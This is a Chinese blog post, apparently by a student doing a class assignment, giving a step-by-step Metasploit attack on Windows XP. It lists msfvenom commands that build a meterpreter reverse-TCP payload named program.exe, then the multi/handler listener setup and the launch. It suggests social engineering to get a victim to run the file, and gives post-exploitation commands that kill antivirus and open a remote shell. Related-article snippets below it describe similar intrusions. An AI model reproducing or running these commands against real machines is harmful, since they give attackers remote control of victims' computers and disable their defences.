使用kali黑掉Windows xp

最新推荐文章于 2024-05-22 09:58:13 发布
最新推荐文章于 2024-05-22 09:58:13 发布
阅读量4.9k 收藏 38
点赞数 9
分类专栏: 黑客攻击 文章标签: kali 黑客 后门 入侵
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41426887/article/details/88539322
版权

    这学期老师布置了一个不算大的大作业,让我们组队做一个攻击。思来想去,作为一个小白,也只能做一些比较简单的攻击,于是就从网上找了用metasploit黑入Windows xp的方法。这里我先把需要的命令列出来,然后详细地解释每条命令的具体含义,最后再介绍一些常用的操作。

1.root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128LPORT=4444 --format=exe -o /root/program.exe

2.root@kali:/# ls -la /root/program.exe

3.root@kali:# msfconsole

4.msf5 > use exploit/multi/handler

5.msf5 exploit(handler) > set payload windows/meterpreter/reverse_tcp

6.msf5 exploit(handler) > set lhost 192.168.189.128

7.msf5 exploit(handler) > set lport 4444

8.msf5 exploit(handler) > exploit

目标系统上运行program.exe

现在就成功入侵了对方的系统。下面就来讲解一下每条指令的用法和含义。

1.root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128LPORT=4444 --format=exe -o /root/program.exe

这条命令创建payload程序。payload是啥呢?payload被称为“载荷”,也就是说能实施恶意行为的部分,就先叫它恶意软件吧。msfvenom是一个根据不同平台产生相应的后门的软件,kali上自带的有。后面的参数:p对应payload,其他的大致都能看明白。需要注意的是,LHOST是自己的主机ip,端口的话可以根据你自己的想法设置,不想麻烦的用4444就行,反正可以建立很多端口。  好啦,这条命令过后,就生成了program.exe作为载荷,放在了root目录下面。

2.root@kali:/# ls -la /root/program.exe

使用这条命令可以查看payload的位置。

3.root@kali:# msfconsole

打开了metasploit,就是那个会用一些字符组成一个很帅的图案的牛逼软件啦。metasploit在网上的定义,唯一有用的就一句:本身附带数百个已知软件漏洞的专业级漏洞攻击工具。所以可以用这个软件做各种骚操作。

4.msf5 > use exploit/multi/handler

按照专业的定义:Metasploit has exploit/multi/handler, which is a special exploit module that isn't really an exploit, for exactly this purpose. All it does is allow you to configure a payload and run the handler for it.大致就是说这个工具会方便你配置payload。

5.msf5 exploit(handler) > set payload windows/meterpreter/reverse_tcp

这里应该就是对payload进行设置吧,我也不太懂,照做吧。

6.msf5 exploit(handler) > set lhost 192.168.189.128

设置攻击机的ip,就是自己kali的ip。

7.msf5 exploit(handler) > set lport 4444

设置端口,上面说过的。

8.msf5 exploit(handler) > exploit

开始攻击。这条命令之后,需要victim打开program.exe,运行payload,这样才能实施攻击。至于如何让victim打开program.exe,这就看你自己了,动用社会工程学等各种方法都行。

在对方没有打开program.exe时,我的界面是这样的,等待中。

当对方打开program.exe后,就变成了下面这样。

这就进入了meterpreter,然后就可以实施各种高端操作了。

1.sysinfo 可以查看victim机器的基本情况。比如系统版本、架构之类的。

2.idletime  查看victim主机的运行时间。

3.run post/windows/manage/killav 关闭victim的杀毒软件

4. shell 进入对方的cmd中

更多操作可以参考这篇https://blog.csdn.net/qq_41880069/article/details/82908293#3meterpreter_185

ding制
关注
  • 9
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
使用kali实践一个简单的winxp漏洞MS08_067
幸福诗歌的博客
01-25 2868
8-067漏洞演示与CVE-2017-11882漏洞复现 MS08_067漏洞是著名的远程溢出漏洞,影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。本次实验就是metasploit利用ms08_0...
Kali渗透测试——利用metasploit攻击靶机WinXP SP1
dif90304的博客
05-19 993
搭建渗透测试环境 Kali攻击机 WinXP SP1 靶机 启动metasploit 跟windows RPC相关的漏洞 内部提供的漏洞攻击 靶机winxp sp1网络配置 查看虚拟机的NAT网段 配置WinXP SP1靶机的IP地址 执行漏洞利用 后漏洞利用:meterpreter> ...
如何使用kali入侵(渗透)一台windows
最新发布
zz12345600354的博客
05-22 793
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
kali入侵XP系统2
weixin_33779515的博客
11-15 1103
保证网络连通性,配置网络 开启PostgreSQL: service postgresql start 开启metasploit: service metasploit start root@kali:~# msfconsole msf > workspace msf > db_status msf > workspace -a...
MSF初体验 - kali linux 入侵XP系统
weixin_30707875的博客
06-12 603
最近做某安全竞赛平台的比赛,真正开始接触Metasploit这一渗透神器,同时也是装逼神器(2333….),下面记录一下初步使用Metasploit的过程。首先在百度百科摘录了一段关于Metasploit Framework 的简要介绍。Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D...
kali linux利用MS12-020漏洞入侵windows xp ,windows 7
边城浪子的博客
08-07 2339
实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:windows server 2003 Enterprise x64 SP2 ip:192.168.172.138 条件:必须开启3389端口,并且关闭防火墙。 攻击过程: step1:kali 中打开终端 ,输入msfcole step2:命令:search ms12-020 命令:usea...
kail利用msf工具对ms10-087漏洞入侵渗透WinXP
qq_50854662的博客
05-27 1927
1.实验环境: Kali2020:10.20.29.129 Windows 2003:10.20.29.137 两台虚拟机能够相互ping通 2.实验步骤 1, 启动Metasploit 2,查找和MS10-087相关的模块search ms10_087 3,使用exploit/windows/fileformat/ms10_087_rtf_pfragments_bof模块 use exploit/windows/fileformat/ms10_087_rtf_pfragments_
Kali Linux Windows Penetration Testing azw3
09-27
Kali Linux Windows Penetration Testing 英文azw3 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn删除
十三、kali windows DVWA搭建及测试
01-15
本文将详细介绍如何在Windows环境下使用Kali Linux搭建和测试DVWA。 一、常见网站漏洞概述 1. SQL注入:这是由于网站未能正确过滤用户输入,使得恶意代码能够执行数据库查询,可能导致数据泄露或破坏。 2. 命令...
Kali使用完整的手册
05-13
Kali使用完整的手册
Kali Linux系统使用基础教程.pdf
11-29
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
Kali Linux系统使用基础教程.zip
06-28
Kali Linux系统使用基础教程.zip
kali渗透XP
jqr999的博客
11-28 1435
kali ping 目标靶机XP + 靶机IP地址   使用:msfconsole     使用 search ms08_067   use exploit/windows/smb/ms08_067_netapi   show options   set RHOST 192.168.1.28   show options     show payloads ...
kali:Nessus扫描漏洞并用msf利用攻击xp系统
qq_45747414的博客
11-23 5642
Nessus扫描漏洞 1.启动nessus服务 /bin/systemctl start nessusd.service 2.在浏览器打开https://192.168.50.128:8834/,登陆 3.进入开始扫描 在启动nessus过程中遇到的问题: NOTICE: Nessus has detected that API access on this scanner is disabled. 这里尝试了使用指令/opt/nessus/sbin/nessuscli update --all ##
kali入侵XP系统3(非法关闭计算机)
weixin_33881041的博客
11-15 885
保证网络连通性,配置网络 开启PostgreSQL: service postgresql start 开启metasploit: service metasploit start root@kali:~# msfconsole 前提目标主机3389端口开放 msf >search CVE_2012_0002 查找ms12_020漏洞 ms...
kali linux 别人电脑,如何使用 Kali Linux 黑掉 Windows
weixin_39634480的博客
05-13 1490
Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一个用于开发和执行安全利用代码(security exploit)的工具。让我们来使用 Kali Linux 来攻破 Windows 吧。请注意,我写这篇文章只是出于...
小白Kali渗透Windows XP专业版SP3
m0_70497070的博客
09-17 1784
小白学Kali?机会来了!
kali入侵电脑
Relievedz的博客
11-17 5969
关闭杀毒软件 查看主机IP:ip addr 生成木马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.236 lport=6789 -f exe -o /root/yhdxtn.exe #msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.236 lport=6789 –f exe –o /root/xss.exe msfconsole ...
LINUX KALI初级渗透XP系统入门学习总结(一)
Taneeyo的博客
02-11 1304
LINUX KALI在 Metasploit框架下初级渗透XP系统入门学习总结(一) Metasploit的辅助模块主要用于信息搜集阶段,功能包括扫描、口令猜解、敏感信息嗅探、FUZZ测试发掘漏洞、实施网络协议欺骗等。这些模块可以分为Admin、Scanner、Server三个大类 第一步 安装好kali以及更新msf模块 更新你的msf框架 root@kali:~# apt-get update...
kali使用msf攻击win xp错误
05-18
但是,通常在使用Metasploit Framework(MSF)攻击Windows XP时可能会出现各种错误。这可能涉及到网络连接问题、操作系统配置问题、MSF模块问题或其他问题。以下是您可能要考虑的一些常见问题和解决方法: 1. 确保...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值